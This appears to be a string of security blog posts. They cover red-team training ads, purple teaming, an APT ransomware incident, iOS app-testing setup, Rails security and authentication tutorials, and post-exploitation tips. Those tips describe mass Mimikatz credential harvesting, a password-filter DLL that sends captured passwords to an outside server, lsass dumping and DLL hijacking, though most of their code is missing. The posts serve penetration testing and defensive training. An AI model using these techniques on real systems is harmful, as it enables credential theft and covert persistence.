BlackHat 2016 is quickly approaching! Early registration ends on Friday. So can save a few bucks and use that to go to Defcon 2016.This year we have decided to split our Tactical Exploitation class into the two major platforms that are covered; Windows and UNIX. The classes are scheduled back to back. So if you sign up for both classes you will get the same Tactical Exploitation course.This decision came from feedback of the students who only seemed to care about one platform or another. We believe this is a mistake since almost any enterprise environment will have both. So for those that only want one platform, you can certainly do that. Or if you want the original multi-platform class on our simulated enterprise environment, you can do that also.All of our classes have a large hands-on component that we feel is essential to the learning experience and material retention. Students must bring their own laptop, but we provide a simulated enterprise infrastructure for the class exercises and additional challenges for the more advanced students. Many of our advanced students just love the opportunity to "play" in a fully functioning environment.We would love for you to join us! These classes have already sold out twice requiring us to move to bigger rooms. But at some point we cannot grow anymore. So sign up NOW! Save some money and reserve your spot!Tactical Exploitation: Attacking Unix - July 30-31, 2016Tactical Exploitation: Attacking Windows - Aug. 1-2, 2016

The clear training objectives (aka a plan to eventually get caught) for the Blue Team is what differentiates Purple Teaming from typical Red Teaming. By its very nature, Red Teaming is making a HUGE attempt not to get caught. You are pulling out all the tips & tricks and big boy tools NOT to get caught. With Purple Teaming, you have a plan to create an alert or event in the event the Red Team is not detected by the Blue Team during the Red Team process so the Blue Team can test their signatures and alerting and execute their incident response policies and procedures.

It isn't a "can you get access to X" exercise it is a "train the Blue Team on X" exercise. The pentesting activities are a means to conduct realistic training.

A couple practical examples:

The Blue Team has created alerts to identify Sysinternals PsExec usage in the enterprise. The Red Team would at some point use PsExec to see if alerts fire off and the Blue Team can determine which hosts were accessed or pivoted from using PsExec. The Red Team could also make use of all the PsExec alternatives (winexe, msf psexec, impacket, etc) so the Blue Team could continue to refine and improve their monitoring and alerting.

Another scenario would be where the Blue Team manager feels like the team has a good handle on the Windows side of things but less so on the OSX/Linux side of the house. The manager could dictate to the Red Team that they should stay off Windows Infrastructure to identify gaps in host instrumentation and network coverage for *nix types hosts and also to force incident response on OSX or Linux hosts.

Another example could be to require the Red Team not to utilize freely available Remote Access Trojans such as Metasploit or powershell Empire. Instead they could ask that the Red Team purchase (or identify a consultancy that already uses) something like Core Impact or Immunity's Innuendo or find a consultancy that has their own custom backdoor to spice things up.

I thought it would be useful to make a post explaining the situation a little more in-depth.

Myself and several colleges (InGuardians, G-C Partners) have been engaged in related, high-impact incident response engagements over recent months.

We have been working together to correlate the results of several major investigations. At least three high-value corporations were hit by well-known APT actors over the holidays between December 2015 and January 2016. The targets in these attacks include:

In the past the primary goals of these actors seemed to be collecting information from targets and maintaining access while evading detection. In these new cases however, the attackers attempted to manually deploy crypto ransomware across large swaths of victim computers in addition to the typical APT tools. This is unusual because in the experience of all three information security firms, crypto ransomware is typically installed opportunistically by malicious websites and drive-by downloads, not manually by an intruder. Also this behavior has always been seen related to criminal activities, not intelligence gathering by nation states.

Before these latest intrusions, active attackers mass installing crypto ransomware on major corporation computers had never been seen by any of the three companies performing the investigations. In the most recent occurrence the attacker made use of a much older breach to automatically deploy ransomware furthering changing the methods seen and used.

This is also unusual because it seems to be in contradiction to the motivations that have been seen in the past. Typically, the motivation behind installing crypto ransomware has been that lone actors or crime rings are using basic phishing tactics to extort relatively small amounts money from individuals or corporations. In contrast, the motivation for APT attacks have traditionally been considered to be nation state directed and focused on stealing valuable information without being detected. The dollar amounts targeted are in the millions.

THEORIES

We have come up with several theories:

After the fallout from the OPM hack, the Chinese government officially backed off from its hacking operations against the US. Numerous individuals who were employed as civilian contractors are now essentially out of work, but still have access to targets and toolsets. These individuals have started employing crypto-ransomware in order to replace lost government income and continue hacking.

This activity is either practice for, or the beginnings of a denial and disruption campaign against US companies. The actors don’t actually care about the money potential but rather are interested in the extensive disruption caused by the attacks.

The activities and motivations of APT actors haven’t changed, but rogue elements within their groups are employing these tactics and reusing existing infrastructure in order to acquire supplemental income.

In one case, the attackers used standard APT tools and techniques to attack laterally and gain access to domain controllers, then launch a GPO to push out the ransomware. Thankfully they made a small typo which caused it to fail. In another case they redirected monetary payments but, due to another small mistake, were caught before too much money was lost.

Due to confidentiality requirements with our clients, we can't post too many more details at this time, but will give updates as we can.

Attack Research, InGuardians, and G-C Partners are continuing to investigate the activity as it progresses. If you have seen similar activity and are willing to share details, please contact any of the three companies.

Well maybe not Gold...but Litecoins, hobonickels, dodgecoins, and other kinds of *coins*

We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today but who knew...

We'll its too late to get in the bitcoin game due to the difficultiy of mining one being super high but thankfully 60+ alternate crypto currencies have sprung up and thanks to sites like www.cryptsy.com you can now trade those alternate currencies for BTC.

First we need to get into our iDevices shell prompt. We will browse Cydia (that gets installed by default with the jailbreak) and then will install the openSSH package.

Once we get openSSH installed you can SSH into your device by finding its IP address in the Settings > Wireless Networks > Advanced ">" menu.

Now SSH into port 22 on that IP using the username "root" and the password "alpine".Once we have shell we can use APT to install most of the other packages we need. Also change the default root password to something else so people can't mess with your phone!Arming your iDevice with *nix toolsTo have a functioning *nix environment we need to install a ton of utilities that aren't usually installed as part of the default jailbreak or Bash shell. This includes utilities like strings, grep, awk, find, etc...Some of the utility packages do not verbatim tell what's inside of them; things like big boss tools and Erika utilities.These two in specific install strings and other binutils type tools. Several of them patched or modded to work on the iOS architecture (arm).Packages (some of these will be pre-installed with the JB):

ExtrasIn addition to utilities that help make our iDevice a functioning *nix environment there are several tools that aid in connecting, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations (some cut from my OWASP page):

Once you get all of these utilities and tools installed you're pretty much waiting on substrate to be working for iOS 7. After that's done you can install your favorite all encompassing or homegrown tool that uses substrate to do hooking such as Cycript, Inlyzer, SSLKillSwitch, Snoopit, IntroSpy, iAuditor, etc.

Then you just have to MitM the web traffic. There are plenty of guides on that around the net. If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments.

I've been here....work has kept me super busy...pretty sure there is a post in 2012 that says about the same. :-/

I attempted to recruit some smart people to make some posts and they did so thanks to all the guest bloggers this year.

so what's been up?

well I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmables RGB color ones. Facebook friends have been kept abreast of the situation. Two, stock trading...which i found out a fair number of hackers are into...which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until i die. See that post for a tiny bit more explanation.

I've been told by a few people that readers would probably find the xmas light stuff interesting as it does involve cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.

anyway. Tech stuff....whats up?

Shitty passwords are whats up this year (totally new issue right??!!!). I didn't go back and count but a large majority of the tests I performed or assisted with this year where there was some sort of single factor login portal (SSLVPN, Citrix, OWA, etc) fell over to one of the following:

http://www.slideshare.net/chrisgates/lares-fromlowtopwnedIts 2013 almost 2014 as I write this, its sad that we are still dealing with this like this a new or unsolvable problem. Just reaffirms to me that we are failing as an industry if today we can break into some organization that spends any dollars on security with Password1. Its really no mystery why bad guys are beating the piss out of people.Earlier this year a guy that does work on things in China gave a talk and said that the Chinese culture thing about security like this: (to paraphrase):"if an organization doesnt protect against stealing it, they must not care about it" Protecting your important **stuff** with Password1, or a web application where any web vulnerability scanner finds SQL... yeah its no surprise when someone steals your *whatever*.Grumpiness aside, we did do some neat shit this year. A pseudo highlight reel can be found in the string of talks that Chris Nickerson, Eric Smith, and Mubix and I gave at Derbycon this year.

Lares continues to break into hard to break into places using Red Teaming.

I also gave a talk at a credit union conference a few months ago where i tried to sum up how organizations are getting owned. TLDR; its all stuff we know about, but it takes work to fix, so not that many organizations do it.

I'd like to thank Joe McCray for recommending it to me. I wish i had read the book in my teens and/or my twenties. There are TONS of reviews on the book i'd encourage everyone remotely interested to read a mix of the 5 star and 1 star ones to get a feel. I'll even drop the most important thing i got from the book here:

Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.

Pretty simple right?! Unfortunately most of us (myself included) have been brought up to look at things like houses, cars, expensive things as assets because we can sell them if we need to for $$. However after being a former BMW owner and a current house owner i can attest that the mentioned items did not *make* me any money. In fact the house is a constant source of cash outflow. This is exactly what the book talks about.Now to be fair, and if you read the reviews this will come across, there is A LOT of magic hand waving on how one starts buying assets instead of liabilities and growing wealth. The author uses real estate and mentions you can start a business or build wealth via stocks/trading as other ways to build wealth (assets). None of those in my opinion are quick, easy, or cheap to get started in and none of those come without a hefty education requirement in order not to lose your starting capital. Nevertheless, the value in the book comes from identifying the problem of how poor people view and interact with money and how rich people view and interact with money as well as giving a general road map on a new way to think about building wealth.thoughts?CG

Again, this requires you to be a very high privileged account, which is no fun. I need these computer lists as part of my internal / post-exploitation recon, not an end step.

For the longest time I relied on a very awesome tool called "Adfind":

adfind -sc computers_active -csv -nodn -nocsvq -nocsvheader

This command will output a list of computer accounts that have been active in the last 90 days in a straight line by line format (hence all of the no "this"and no "that" flags)

But that wasn't good enough, this image kept haunting me:

It's Active Directory Explorer by SysInternals. It shows the complete list of DNS records, stored as objects in Active Directory that I was able to get to as a basic domain user. This means all of the static DNS records for the unix systems and mainframes and other systems outside of the purely Windows world are there as well.

I spent 4 days attempting to write my own script, ldap query, prayer to get all of the data out but was unsuccessful. On the 5th day I happened upon a very short post saying "I did it", as I probably would have written the same. It comes in the form of a PowerShell script that you can find here:

If you put a -csv on the end of those the author has even given you the CSV format which makes the output extremely easy to parse. Now you can throw your list into your tool of choice instead of scanning random IP ranges on the targets network for important stuff you can scan directly against known good hosts.

-- mubix

P.S. Yes I realize this isn't actually "Zone Transfer"s but its close enough

clymb3r recently posted a script called "Invoke-Mimikatz.ps1" basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

(This works REALLY well for Citrix and Kiosk scenarios and it's too hard to type/remember)This runs the powershell script by directly pulling it from Github and executing it "in memory" on your system. One of the awesome added capabilities for this script is to run on a list of hosts. as so:

This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn't a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it "Mass Mimikatz"

Step 1. Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:

We are setting "Everyone" permissions on a Share (net share) and NTFS (icacls) level for this to work properly.

Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the "Everyone" token so that we don't have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rbor you can just make the following changes"

Step 6. Upload mongoose: Downloads Page - Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.

Step 7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on. You'll have to gather this one way or another.

Step 8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

Password Filters [0] are a way for organizations and governments to enforce stricter password requirements on Windows Accounts than those available by default in Active Directory Group Policy. It is also fairly documented on how to Install and Register Password Filters [1]. Basically what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages

with the name of a DLL (without the extension) that you place in Windows\System32\

For National CCDC earlier this year (2013), I created an installer and "evil pass filter" that basically installed itself as a password filter and any time any passwords changed it would store the change to a log file locally to the victim (in clear text) as well as issue an HTTP basic auth POST to a server I own with the username and password.

The full code can be found below. I'll leave the compiling up to you but basically its slamming the code in Visual Studio, telling it its a DLL, and clicking build for the architecture you are targeting (Make sure to use the Internet Open access settings that make the most sense for the environment you are using this in [2]).

So lets walk the exploitation:

First, you have to be admin or system, as this is more of a persistence method than anything.

What you can't see here since Metasploit isn't showing the line breaks is that there are two there by default:

sceclirassfm

We need to add ours to the end of this list, unfortunately at the current point of time its impossible to do directly from the meterpreter command line (as far as I know). So we need to drop a .reg file and manually import it. Easiest way to do that is to add your "evilpassfilter" string as well as the ones on the victim to a VM you have and export it. Should look like this:Once we have our file, we upload and import it using reg command:

This works from Windows 2000, XP all the way up to Windows 8 & 2012.Ok, but how often are local password changed? Maybe not that often, but guess what happens when a password filter is put on a domain controller. Every password changed by that DC is "verified" by your evil password filter.Oh and what does that log file we talked about earlier on the victim look like if for some reason they block that IP you're getting your authentication to? (You would have to find a way to get back on that system, or make it available via a share or otherwise)

If you've ever used proxychains to push things through Meterpreter, one of the most annoying things is its "hardcoded" DNS setting for 4.2.2.2, if the org that you are going after doesn't allow this out of their network, or if you are trying to resolve an internal asset, you're SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is I've finally decided to make a note of it.There isn't much magic here other than knowing that this file exists, but /bin/proxyresolv is a bash script that calls "dig" using TCP and the DNS server specified so it goes through the proxychains. Here is what it looks like:(on Kali linux its found here: /usr/lib/proxychains3/proxyresolv)

#!/bin/sh# This script is called by proxychains to resolve DNS names# DNS server used to resolve namesDNS_SERVER=4.2.2.2

Now you could just make the dig request yourself through proxychains then throw whatever you originally attended directly at an IP, or you can make the DNS_SERVER change and hardcode your engagement's internal IP, up to you, but now its documented and I'll never have to go searching like crazy again... as long as I remember that its on someone else's blog.

DLL Hijacking is nothing new and there are a number of ways to find the issue, but the best way I have found is a bit more forceful method using a network share. First we need a network share that we can 1. monitor every request failed or not, and 2. allow ANYONE to access that share because if there is a problem with a service that runs as SYSTEM its not going to have credentials to authenticate against a share with more constrained permissions.

Step 1: Set up Samba w/ guest access

In /etc/samba/smb.conf add these two shares. (You need to also create the directories in /tmp)

Step 2: Set PATH to share IPThe PATH environmental variable is what controls where things are "looked" for when being called if and when someone or some part of the OS attempts to run something without its full path. For example, you probably don't type C:\Windows\System32\calc.exe every time you want calc to pop up (ok, bad example since you probably just double click the shortcut, but you get the idea). Same on Linux actually as well, if someone types 'ls' the system does a quick check in all of the PATH directories for the 'ls' binary, stopping at the first instance it finds it. So below in the screen shot you can see me adding our share to the very beginning of the PATH variable using the ';' semicolon as a delimiter:

Step 3: Use wireshark (smb) mask to find STATUS_OBJECT_NAME_NOT_FOUND messagesNow we need to find a way to monitor the requests that are going to happen. I initially tried using just standard Samba logging turned all the way up to level 5. The problem was parsing and turn around. I found it easier to use wireshark

The screen shot shows how you can add the "File name" in the response and request packets to a column to make it easier to scroll through as the requests go by.On a Windows 7 machine I have as a VM, when I reboot I get “oci.dll” as one of the DLLs that get requested:

Step 6: Get shellSystem reboots..Step 7: Next StepsOk, but that requires a reboot. What other hijacking can I do? Start some programs, services, open file types and just watch what is attempted to be loaded. If you see an EXE or DLL being requested to the share, rename your evil bin, and repeat whatever you did to cause the request.

This can result in persistence methods or sometimes privilege escalation, but be sure to test as much as possible, because if you override the loading of a critical DLL or executable, you may cause service disruption (anywhere from just a popup about a crash to a complete stall of the system).

Android App testing requires some diverse skills depending on what you're trying to accomplish. Some app testing is like forensics, there's a ton of server side stuff with web services, and there's also times when you need to show failings in programmatic protections or features which requires reversing, debugging, or patching skills.

To develop these skills you need some practice targets. Here's a list of all known Android security challenges, both app level vulns and crackme-type (RE/patching):

In some cases the write-up and challenge starter info is included, in other cases you might have to Google around as some of these CTF's are old.

I tweeted about this blog post a few weeks ago and got to use it on a PT, so its no secret...

also mubix beat me to this post, but i'm posting it here for my notes keeping purposes

First, check out this post by the mimikatz author. Now, one of the twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately i'm rarely sitting with a GUI and can just "right click" but i do usually have the ability to "net use" and create scheduled tasks. The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.

So quickly how I've been doing it.

Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat

Why not just push up mimikatz? Well, mimikatz you download is now tagged by AV, so you can compile you own and get around that, white listing tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell, but mostly this method make it so you don't need a meterpreter sessions or other type of interactive shell on the remote host. run bat file, get your dump file, and get creds offline.

------

if for some reason you want to run mimikatz via a bat file you can use the following commands

I ended up using Method 2 on a recent test. The post above calls for needing an elevated command shell so you can call "at". This is easy if you are legitimately sitting in front of the box but if you pentesting, potentially harder.

Three scenarios:

user is regular user and cant UAC to let you run admin commands

user is local admin and UAC disabled.

user is local admin buy you have to bypass UAC

easiest way sitting on a command shell is probably just to type "at"\

ohh man, denied :-(

yay!

Scenario 1, your screwed, gonna have to solve the not admin problem first.

anger!

Scenario 2, no UAC...just follow the linked blog post. Get a copy of remote.exe either x86 or x64 whatever architecture the system you want to run it on is and do the following command:

1. its now librex instead of rex that should save you a few minutes of debugging the cant find rex/proto error :-)

2. make sure you comment out the stuff Rob mentions to here:

3. the ocra stuff works as described.

4. the exe option is important as the metasploit psexec doesn't behave like sysinternals psexec.

The exe needs to be a service binary, so you cant just call cmd.exe like you can with the sysinternals psexec.Normally metasploit uploads a service binary that kicks off your msf payload so in this case you need a binary that behaves like a service. Rob gives us a hint with the one he uses in the example (adduser.exe).

so find yourself a service bin to do whatever it is you want it to do and use that with your standalone psexec. I ended up using an exe that made a local admin user and then used that for follow on stuff, not optimal but was in a tight spot (hence using the standalone psexec to start with)

It is well known in the Rails world, how big of an issue mass-assignment is. It is the vulnerability that led to the hack of Github last year. Normal interactions with an ActiveRecord model can lead to mass-assignment. A hacker can abuse an Model.new or Model.update_attributes, etc to change more attributes than expected by the developer. The most obvious example is a column that defines a user's role. If an attacker is able to mass-assign this value they could make themselves an admin. More information about mass-assignment is in a RailsCast linked below.

Creating a user without using mass-assignment.

An example of a mass-assignable create action.

In Rails 2 and 3 to protect against mass-assignment you would set attr_accessible on your model. This would allow you to specify which attributes of a model could be mass-assigned.

Example model with attr_accessible set.

The example above will prevent mass-assignment of all attributes except for the name attribute. Hackers can no longer mass-assign themselves as admins! When used correctly, this solution has done a good job of protecting Rails applications from mass-assignment. While attr_accessible has proved to be a good solution to the issue but it's not as flexible as developers would like it to be. There are times when you want to update all attributes of a model, like when an admin is updating a user's record. In those cases, developers would have to do funky things with :as admin and pass additional parameters to ActiveRecord calls.

Complex models with varying authorizations would become hard to maintain. To address this and other issues David Heinemeier Hansson (@dhh) created strong_parameters. Strong_parameters tries to address the issue of mass-assignment in the controller instead of the model. Strong_parameters is available as a gem for Rails 2 & 3 but will be the default protection in Rails 4.

Creating user with strong_parameters enabled.

Now with strong_parameters instead of defining attr_accessible on the model you use the .permit during a call to an ActiveRecord call. As shown in the example above, we're permitting the assignment of name and admin (a boolean column). This protection is enabled on ActionController::Params. Many developers prefer this type of control to be in the controller and it reduces the complexity of the model. RailsCasts has a great pro episode that covers how to use strong_parameters.

The issue with strong_parameters is where this protection is enforced. Only ActionController::Params are protected with strong_parameters. Any user parameters that come through a controller will have this protection enforce. The security concern is when data comes from users and does not go through a controller and enters a model mass-assignment is possible. Any user parameters outside of a controller that are introduced to the model can be used to mass-assign.

In the example above a controller action is accepting user params in JSON format, parsing them and then using them in a call to User.new. The example above could be in a controller action used as an API endpoint that accepts parameters in JSON format. The issue is that when we parse the parameters we lose the protection of strong_parameters. We no longer need to call .permit on them to use them in a model and are now vulnerable to mass-assignment. Another example that could lead to mass-assignment is a file upload feature. A user provided CSV file could mass-assign attributes if the values aren't dealt with carefully.

Possible ProtectionsThe most obvious choice to protect your application from mass-assignment when using strong_parameters is to wrap all user data in ActionController::Parameters before use in any models. While this is very easy to do, it makes the developer responsible for remembering to do this on every use of parameters. This could be easily forgotten in the heat of a quick patch. Other options for protecting against mass-assignment outside of controllers is strict parsing of incoming data. For instance calling .slice on a hash and selecting only the data you need. This again puts the onus on the developer to handle user data carefully.

Rails 4 and strong_parameters help developers create more tightly defined authorization rules for interacting with models but at the cost of some security. We can no longer rely on ActiveRecord to defend us against mass-assignment and must be very aware of what data is passed to models. While this is a step forward for usability, it seems like a step backwards for security.

If you've ever tested any clients that have Juniper VPNs you've probable seen the ol:

http://[target]/dana-na/auth/url_default/welcome.cgi URL.

@infosecmafia and I mentioned in our DerbyCon talk on how you can sometimes find extra or test URLs that are also valid URLs for the Juniper VPN. The example we used was where the url_default required secret questions but url_8 or whatever did not because it was a test URL the admins had set up.

Soooooooo, its worth running a quick check if you come across one. I wrote a Metasploit auxiliary module to do this. Pretty simple, it just runs thru url_0 through url_100 and prints out the 200 replies. looks like so:

–[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_0/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_1/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_2/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_3/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_4/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_5/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_6/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_8/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_9/welcome.cgi –[+] 192.168.1.1:443 Received a HTTP 200 with bytes for /dana-na/auth/url_12/welcome.cgiSeeing these doesn't ALWAYS mean you have a multi-factor bypass but its worth checking out if the main site is multi-factor.

Random example:url_defaulturl_3url_8url_10

Available on my github repo until I get around to doing a pull request.

Thanks to the efforts of Justin Collins (@presidentbeef - Brakeman) and Hal Brodigan (@postmodern_mod3 - Bundler-Audit), Rails developers (and Sinatra) can use these two tools in tandem with Guard to protect their applications while under development. For those who aren't familiar, Guard was designed to run while you are developing, when you save a file it triggers Guard to run whatever tests you've specified in your Guardfile.

Ruby applications that utilize a Gemfile/Gemfile.lock, file(s) that contain the list of ruby gems an application should use along with their respective version number, can now be audited to determine if those libraries are vulnerable.

Credit to postmodern for developing the auditing gem and also to RubySec for creating the ruby-advisory-db, a community maintained database of Ruby gem vulnerabilities for which bundler-audit is built on top of. So to install this - gem install bundler-auditto run it, navigate to the directory where the Gemfile.lock is stored:bundle-audit checkIf the application is using a vulnerable version of a gem, the output will look like...

This post is a very short and very simple tip for easily opening a ruby gem up for closer inspection.

When reviewing a Rails or Sinatra application (code review), it sometimes becomes necessary to view the libraries (ruby gems) that an application is including and using. Instead of navigating to the ~/.rvm/gems/<version>@<gemset name> directory (or wherever else the gems are stored) and opening them with your text editor of choice, you can instead leverage the power of bundler.

For your *nix based systems that leverage a bashrc, bash_profile, etc.

We've been having a good time doing intensive, month long or longer APT simulation tests for people, acting like malicious insiders, using hardware implants, 0days, human enabled malware, etc. Lately, however, we've been playing around with a new type of testing to take things to the next level. This testing has two basic components:

Reverse Engineer Testing

Network Forensics Testing

The basic idea is to exercise your RE and packet ninjas even harder to make them strong.

On the RE side we create progressively more difficult malware for them to analyze. Here is an example of a ramp up path for this kind of test:

Essentially we infect your systems with progressively more difficult to analyze malware (that we develop ourselves and ensure is safe), causing your in-house analysts to stretch, learn new skills, and practice so that when real world malware hits, you are ready to deal with it.

We pen test your reverse engineer.

(Or your sandbox appliance if you have decided to go that route instead).

On the Network Forensic side we ramp up the difficulty of our command and control and data ex-filtration techniques in order to exercise and improve your network security staff's capabilities in the following ways:

Randomized timing & changing beacons

Out of band network communications

Protocol misuse & covert channels

False flag / false signature packets

Complex sequencing & esoteric packet based OP codes

Port knocking type attacks

Encoding & encryption

Exploits against network analysis tools

This allows your network forensic analysts to hone their skills looking for anomalous traffic and finding the tricky ways real bad guys hide from detection. It also shows you how effective (or ineffective) your network security appliances such as IDS/IPS are.

All of the tricks and techniques we use for these tests are taken from real world experience in analyzing some of the trickiest malware and the most complex network evasion schemes during incident response events. In addition we throw in some of our own developed methods to keep the analysts on their toes.

This type of testing is most effective as a component to a larger APT simulation but can be done stand alone as well.

At this point in 2013 you probably know what machines on your network need to be patched. You have automated vulnerability scans in place and you have verified and validated scan reports using an exploitation framework. Maybe you've taken that additional step of doing APT simulations to understand your exposure to malicious insiders and sophisticated targeted threats like nation states. However, unless you are testing that final line of defense, the analysts, forensic specialists and anomaly tools, you are still falling behind.

One of the modules in our new Rapid Reverse Engineering class is artifact extraction. For this section of the class the students use a python module we create for doing some artifact/metadata extraction from samples. One of the more interesting pieces of metadata that attackers leave behind is the software that the malicious file was created with. In this case I was looking at some PDFs. I then realized that I extract this information for individual samples, but I have never run a test on a large set of known APT malware to see what comes out. So a quick adventure I set out on and wow was I surprised by the information.

I ended up with the following pie graph

The sample size was roughly 300+ known APT samples that we have. It wasn't our whole sample set of PDF's but for starters was a decent size. List (top 10) looked like this

A number of things amazed me about this data. One of them was the lack of opsec on the attackers perspective, and the old versions of software that they are using. From the offensive perspective if you are dealing with targets that have resources to do deep level forensics and operations then every little bit of opsec is needed. It only takes a small amount of data to put together a large piece of the puzzle.

From the defensive position it points out the ability for defense organizations to do some early detection. I doubt that most organizations are actually keeping track or analyzing what types of clean, business case pdfs come through the front doors. What do the normal clean pdf's coming through your front doors actually look like? Are the clean business case PDFs being created by the"Python PDF Library - http://pybrary.net/pyPdf/" software? This is a piece of software that is no longer maintained. If you have a standard set of pdf's that come through your front doors and they aren't using strange libraries such as pyPDF then it might be time to create a nice little snort signature and alert on it. I wouldn't recommend blocking at that level (unless you are up for it), but alerting on something simple like that can create extremely large dividends for response/defense teams. Imagine telling your CIO/CISO that you detected and re-mediated APT* attack coming through the front door by a simple snort sig. Some of the honorable mentions for that didn't make it into the top 10 are:Advanced PDF Repair at http://www.pdf-repair.comAcrobat Web Capture 6.0 (wow that is old)¦ d o P D F V e r 6 . 2 B u i l d 2 8 8 ( W i n d o w s X P x 3 2 ) *Ya that is the way it show's upalientools PDF Generator 1.52PDFlib 7.0.3 (C++/Win32)

I am getting to the point that you must look at data sets and see what type of information you can gleam from them. This idea might be feasible in your organization and it might not, but you as the defender have the ability to determine that for yourself. At the end of April (25-26th) we are debuting Rapid Reverse Engineering in New York City with Trail Of Bits http://www.trailofbits.com/training/#rapidre. Rapid Reverse Engineering is a class designed for helping students learn how to rapidly assess files for incident response scenarios.

We have finalized our training schedule for Attack Research for the year. Below is the schedule for our training's for the rest of the year. We can't promise that more opportunities will pop up but below is a confirmed schedule:

April 25th-26th Course: Debuting - Rapid Reverse EngineeringLocation: New York City at an Attack Research/Trail of Bits trainingMay 21st-22nd Course: Operational Post ExploitationLocation: Attack Research HeadquartersThis is going to be a unique class. As mobile devices are becoming more and more prevalent we will be incorporating this concept into this class. Each student will be getting a Nexus 7 that will be incorporated for use in the class!June (exact dates TBD)Course: Rapid Reverse Engineering and Offensive TechniquesLocation: London, UKWe are working the details now and will update things when we have new information. July 27th-August 1stCourse: Debuting- 4 day version of Tactical Exploitation - 2 day version of Tactical Exploitation. Location: Blackhat, Las VegasWe have seen our Tactical Exploitation class fill up quite fast in the recent years so register early! September 23-25thCourse: Offensive TechniquesLocation: BruCON 2013October (exact dates TBD)Course: Offensive Techniques or Rapid Reverse EngineeringLocation: Source Seattle

November 4th-6thCourse: Offensive Techniques AND Rapid Reverse EngineeringLocation: CountermeasureLast year we debuted Offensive Techniques at Countermeasure, and this year we will be adding some new content and delivering that class again. Along with Offensive Techniques we will be teaching our new Rapid Reverse Engineering class. Countermeasure was a fantastic conference and look forward to another round of it. For more info on each class visit our training page at www.attackresearch.com, or click on the links to register for the class!

We are hosting two training's at the Attack Research Headquarters over the next few months. The first training is our Operational Post Exploitation class which will be January 29th-January 30th.

We have just added Offensive Techniques in February for an available training as well. We will be hosting the training February 26th-February 28th. More details can be found at our training website.

We are also looking at doing a round of training in the London area in May of this year. Right now we are trying to gauge the interest in this location. If you are interested in taking either Offensive Techniques or Rapid Reverse Engineering in this are please email training@attackresearch.com so that we can gauge interest.

Also, a small but important detail, please ensure within your Gemfile you change:

gem 'bcrypt-ruby', '~> 3.0.0'

to

gem 'bcrypt-ruby', '~> 3.0.0', :require => 'bcrypt'

Now........back to the series. So, we last left off where a login page was visible when browsing to your site but it didn't really do anything. Time to rectify that.

Within the Sessions controller, a create method was defined and in it we called the User model's method, "authenticate". We have yet to define this "authenticate" method so let's do that now.

Located at /app/models/user.rb

Also, we are going to add an encrypt method and call it using the "before_save" Rails method. Basically, we are going to instruct the User model to call encrypt_password when the "save" method is called. For example:

So when you see something like user = User.new and user.save you know that the encrypt_password method will be called by Rails prior to saving the user data because of the "before_save" definition on line 4.Now we have to add a few more things:

These are basically Rails validation functions that get called when attempting to save the state of an object that represents a User. The exception being "attr_accessor", which is a standard Ruby call that allows an object to be both a getter & setter.

Okay, now let's see what it looks like.

Alright, so now we have a login page that does something but we need to create users. For this application's purpose, we are going to allow user's to signup. Let's provide a link for this purpose on the login page and even further, let's create a navigation bar at the top. We want this navigation bar visible on every page visited by the user. Easiest way to do that is to make it systemic and place it within the application.html.erb file under the layouts folder. Unless overridden, all views will inherit the properties specified in this file (navigation bar, for example).

Located at /app/views/layouts/application.html.erb

Without explaining all of Twitter-Bootstrap, one important thing to note is the class names of the HTML tags (ex: <div class="nav">) are how we associate an HTML element with a Twitter-Bootstrap defined style.

The logic portion, the portion that belongs to Ruby and Rails, are Lines 13 -18. Effectively we are asking if the user (current_user) visiting the page is authenticated (exists), if they are (do exist), show a link to the logout path. Otherwise, render a login and signup path link.

You are probably wondering where link_to and current_user come from. Rails provides built-in methods and you'll notice, in the views, they are typically placed between <%= and %>. So, link_to is a built in method. However, current_user is defined by us within the application controller and is NOT a built-in method.

